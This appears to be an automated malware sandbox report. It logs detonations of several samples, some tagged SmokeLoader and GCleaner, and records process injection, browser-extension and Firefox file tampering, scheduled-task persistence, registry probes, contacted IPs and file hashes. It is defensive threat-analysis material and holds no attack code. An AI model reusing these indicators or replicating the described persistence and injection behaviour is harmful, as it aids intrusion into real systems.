| US | 76.95.39.48:8080 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\MYQXM.k
| MD5 | 942afe4b6c981193fda8ede7a57fd5bb |
| SHA1 | 62e6bb30e5a02920a3bbb1dffa7bd90d699afcd6 |
| SHA256 | 99128a36e75d6739f15b1c5e8b40b5afe57740e6bf3d573c8636b26f78b2fb88 |
| SHA512 | 2089221b9d554e51b016415b7e07c65ee0d76b1d3136a9424a98212ca812cb8d263d716d79cc4addca40f2c67df25ad642dfa903b6a641afba219bd9fc797955 |
memory/1588-4-0x00000000022A0000-0x000000000246A000-memory.dmp
memory/1588-6-0x0000000002BD0000-0x0000000002CF9000-memory.dmp
memory/1588-5-0x0000000002970000-0x0000000002A9E000-memory.dmp
memory/1588-7-0x0000000002970000-0x0000000002A9E000-memory.dmp
memory/1588-8-0x00000000022A0000-0x000000000246A000-memory.dmp
memory/1588-10-0x0000000002D00000-0x0000000002DBD000-memory.dmp
memory/1588-11-0x0000000002DC0000-0x0000000002E69000-memory.dmp
memory/1588-14-0x0000000002DC0000-0x0000000002E69000-memory.dmp
memory/1588-12-0x0000000002DC0000-0x0000000002E69000-memory.dmp
memory/1588-16-0x0000000002DC0000-0x0000000002E69000-memory.dmp
memory/1588-18-0x0000000004D60000-0x0000000004E02000-memory.dmp
memory/1588-17-0x0000000002E70000-0x0000000004D5F000-memory.dmp
memory/1588-19-0x00000000002F0000-0x000000000038C000-memory.dmp
memory/1588-21-0x00000000002F0000-0x000000000038C000-memory.dmp
memory/1588-22-0x00000000002F0000-0x000000000038C000-memory.dmp
memory/1588-23-0x0000000000090000-0x0000000000091000-memory.dmp
memory/1588-25-0x00000000000A0000-0x00000000000A4000-memory.dmp
memory/1588-33-0x0000000002BD0000-0x0000000002CF9000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-11 08:10
Reported
2024-11-11 08:13
Platform
win10v2004-20241007-en
Max time kernel
95s
Max time network
136s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4820 wrote to memory of 3976 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 4820 wrote to memory of 3976 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 4820 wrote to memory of 3976 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe
"C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe"
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" -s MYQXM.k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 76.95.39.48:8080 | tcp | |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\MYQXM.k
| MD5 | 942afe4b6c981193fda8ede7a57fd5bb |
| SHA1 | 62e6bb30e5a02920a3bbb1dffa7bd90d699afcd6 |
| SHA256 | 99128a36e75d6739f15b1c5e8b40b5afe57740e6bf3d573c8636b26f78b2fb88 |
| SHA512 | 2089221b9d554e51b016415b7e07c65ee0d76b1d3136a9424a98212ca812cb8d263d716d79cc4addca40f2c67df25ad642dfa903b6a641afba219bd9fc797955 |
memory/3976-5-0x0000000002100000-0x00000000022CA000-memory.dmp
memory/3976-6-0x0000000002930000-0x0000000002A5E000-memory.dmp
memory/3976-7-0x0000000002B90000-0x0000000002CB9000-memory.dmp
memory/3976-8-0x0000000002100000-0x00000000022CA000-memory.dmp
memory/3976-9-0x0000000002930000-0x0000000002A5E000-memory.dmp
memory/3976-10-0x0000000002CC0000-0x0000000002D7D000-memory.dmp
memory/3976-11-0x0000000002D80000-0x0000000002E29000-memory.dmp
memory/3976-12-0x0000000002D80000-0x0000000002E29000-memory.dmp
memory/3976-14-0x0000000002D80000-0x0000000002E29000-memory.dmp
memory/3976-15-0x0000000002D80000-0x0000000002E29000-memory.dmp
memory/3976-17-0x0000000004D20000-0x0000000004DC2000-memory.dmp
memory/3976-16-0x0000000002E30000-0x0000000004D1F000-memory.dmp
memory/3976-18-0x0000000004DD0000-0x0000000004E6C000-memory.dmp
memory/3976-20-0x0000000004DD0000-0x0000000004E6C000-memory.dmp
memory/3976-21-0x0000000004DD0000-0x0000000004E6C000-memory.dmp
memory/3976-23-0x0000000000420000-0x0000000000421000-memory.dmp
memory/3976-25-0x0000000000430000-0x0000000000434000-memory.dmp
memory/3976-31-0x0000000002B90000-0x0000000002CB9000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-11 08:10
Reported
2024-11-11 08:13
Platform
win7-20240708-en
Max time kernel
118s
Max time network
118s
Command Line
Signatures
SmokeLoader
Smokeloader family
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\PL\6523.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\PL\6523.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1452 wrote to memory of 1932 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\6523.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 1452 wrote to memory of 1932 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\6523.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 1452 wrote to memory of 1932 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\6523.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 1452 wrote to memory of 1932 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\6523.exe | C:\Windows\SysWOW64\WerFault.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\PL\6523.exe
"C:\Users\Admin\AppData\Local\Temp\PL\6523.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1452 -s 168
Network
Files
memory/1452-1-0x0000000000230000-0x0000000000330000-memory.dmp
memory/1452-2-0x00000000003A0000-0x00000000003A9000-memory.dmp
memory/1452-3-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1452-5-0x00000000003A0000-0x00000000003A9000-memory.dmp
memory/1452-4-0x0000000000400000-0x0000000000448000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-11 08:10
Reported
2024-11-11 08:13
Platform
win10v2004-20241007-en
Max time kernel
95s
Max time network
139s
Command Line
Signatures
Reads user/profile data of web browsers
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe
"C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | aaa.apiaaaeg.com | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aaa.apiaaaeg.com | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
memory/4036-0-0x0000000140000000-0x000000014060D000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-11 08:10
Reported
2024-11-11 08:13
Platform
win7-20240903-en
Max time kernel
142s
Max time network
147s
Command Line
Signatures
GCleaner
Gcleaner family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\PL\setup.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PL\setup.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\PL\setup.exe
"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"
Network
| Country | Destination | Domain | Proto |
| US | 208.67.104.97:80 | tcp | |
| US | 208.67.104.97:80 | tcp | |
| US | 208.67.104.97:80 | tcp | |
| US | 208.67.104.97:80 | tcp | |
| US | 208.67.104.97:80 | tcp | |
| US | 208.67.104.97:80 | tcp | |
| US | 208.67.104.97:80 | tcp |
Files
memory/2560-1-0x00000000008A0000-0x00000000009A0000-memory.dmp
memory/2560-2-0x0000000000390000-0x00000000003CF000-memory.dmp
memory/2560-3-0x0000000000400000-0x0000000000443000-memory.dmp
memory/2560-4-0x00000000008A0000-0x00000000009A0000-memory.dmp
memory/2560-5-0x0000000000390000-0x00000000003CF000-memory.dmp
memory/2560-6-0x0000000000400000-0x000000000045E000-memory.dmp
memory/2560-7-0x0000000000400000-0x0000000000443000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-11 08:10
Reported
2024-11-11 08:13
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS7BB8.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS7BB8.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS79E3.tmp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS7BB8.tmp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\lGXdzfP.exe | N/A |
| N/A | N/A | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
Indirect Command Execution
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\lGXdzfP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1DEB6997DB25CE8EC844B742DDA6F019 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS7BB8.tmp\Install.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\lGXdzfP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1DEB6997DB25CE8EC844B742DDA6F019 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\oWxSecJNU\FtJrrrO.xml | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File created | C:\Program Files (x86)\LsajhStaXkJRC\gFQELly.xml | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File created | C:\Program Files (x86)\YNUWFfCEdUiU2\NPTizCFMSHHNz.dll | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File created | C:\Program Files (x86)\YNUWFfCEdUiU2\hpHQDcJ.xml | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File created | C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\MlsEPJL.dll | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File created | C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\IjRGpGI.xml | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File created | C:\Program Files (x86)\oWxSecJNU\PiCMHN.dll | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File created | C:\Program Files (x86)\LsajhStaXkJRC\cqPlUzH.dll | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File created | C:\Program Files (x86)\QpigBxJgKxUn\njTPGnK.dll | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\zeLHdclAQOoTZxj.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\dBpreMcpfXbehynYz.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\bJbhxhmwQPPePEjnjA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\FTlmQXMDCFpnewAuq.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS7BB8.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
